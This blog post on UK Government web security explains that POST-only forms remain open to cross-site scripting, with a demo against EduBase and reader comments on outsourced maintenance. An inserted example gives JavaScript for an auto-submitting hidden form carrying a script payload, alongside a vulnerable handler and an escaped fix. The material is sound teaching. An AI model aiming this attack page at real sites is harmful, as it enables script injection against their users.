This is part 2 of a series of blog posts looking at the security of the UK Government’s web infrastructure.
Many XSS flaws rely on altering the GET parameters of a request. Some webmasters seem to think that if their forms only use POST they will be immune from XSS. This is not the case: a page under an attacker's control can build a form pointing at the target and submit it from the victim's browser, so POST parameters are just as attacker-controlled as anything in the query string.
Don’t Press This Button
Pressing this button will send a POST request to the Department of Education’s EduBase website.
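The mechanism behind that button, as an added example that is not part of the original post and not EduBase's code: the attacker side is a page carrying a hidden form that POSTs itself to the target as soon as it loads, and the target side is a toy handler that reflects the submitted field into its response. The target URL, the field name `q` and the payload are hypothetical placeholders; the only difference between the vulnerable and fixed handlers is the output encoding.

```javascript
// Added example, not code from the original post. TARGET, FIELD and PAYLOAD
// are assumed placeholders, not EduBase's real endpoint or parameter names.
const TARGET = "https://target.example/search"; // assumed: a page that reflects a POST field
const FIELD = "q";                              // assumed: the reflected field's name
const PAYLOAD = "<script>alert(document.domain)</script>";

// Escape a string for safe interpolation into HTML text or attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Attacker side: the HTML for a page that POSTs `fields` to `action` on load.
// The submit() call means no button press is needed at all; a link to this
// page is enough. Entity-encoding the values only keeps the HTML well-formed:
// the browser decodes them again before submitting, so the target receives
// the raw payload.
function buildAutoPostForm(action, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `<input type="hidden" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`)
    .join("\n    ");
  return `<!doctype html>
<body>
  <form id="f" method="POST" action="${escapeHtml(action)}">
    ${inputs}
  </form>
  <script>document.getElementById("f").submit();</script>
</body>`;
}

// What the browser actually puts on the wire for that form
// (application/x-www-form-urlencoded, exactly like a GET query string).
function encodeFormBody(fields) {
  return new URLSearchParams(fields).toString();
}

// Target side: a toy handler that reads the POST body and reflects FIELD.
// escapeOutput=false reproduces the vulnerable behaviour; true is the fix.
// Note the request method plays no part: the body is parsed and reflected
// exactly as a query string would be.
function renderSearchPage(body, escapeOutput) {
  const q = new URLSearchParams(body).get(FIELD) || "";
  const shown = escapeOutput ? escapeHtml(q) : q;
  return `<h1>Results for: ${shown}</h1>`;
}

function demo() {
  const body = encodeFormBody({ [FIELD]: PAYLOAD });
  return {
    attackerPage: buildAutoPostForm(TARGET, { [FIELD]: PAYLOAD }),
    postBody: body,
    vulnerable: renderSearchPage(body, false), // payload lands as live markup
    fixed: renderSearchPage(body, true),       // payload lands as inert text
  };
}

const result = demo();
console.log(result.attackerPage);
console.log(result.vulnerable);
console.log(result.fixed);
```

The check to run against a real form is the same: submit it from an origin you control rather than from the target's own page, and look at whether the response reflects your input with or without encoding. Restricting a form to POST changes nothing about that; only output encoding (and, for the cross-site submission itself, an anti-CSRF token that the handler actually verifies) does.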
I think you’ve over-stated the outsourcing element. Lack of escalation process and/or ownership (and problems responding to emergencies) isn’t unique to outsourced systems and the result is the same regardless.
It can certainly be a problem with internal teams. But I’ve never seen an outsourced team which has the same level of access to decision making members of staff in the “parent” organisation.
Additionally, outsourced partners are – in my experience – much more concerned about hitting contractual metrics than about solving problems. Sometimes that works – often it doesn’t.
‘Solving problems’ is a pretty good contractual metric, but it may also be that the customer here just doesn’t think it’s a good cost / benefit to pay for greater agility*.
* Guessing, I have no knowledge of this site or supplier.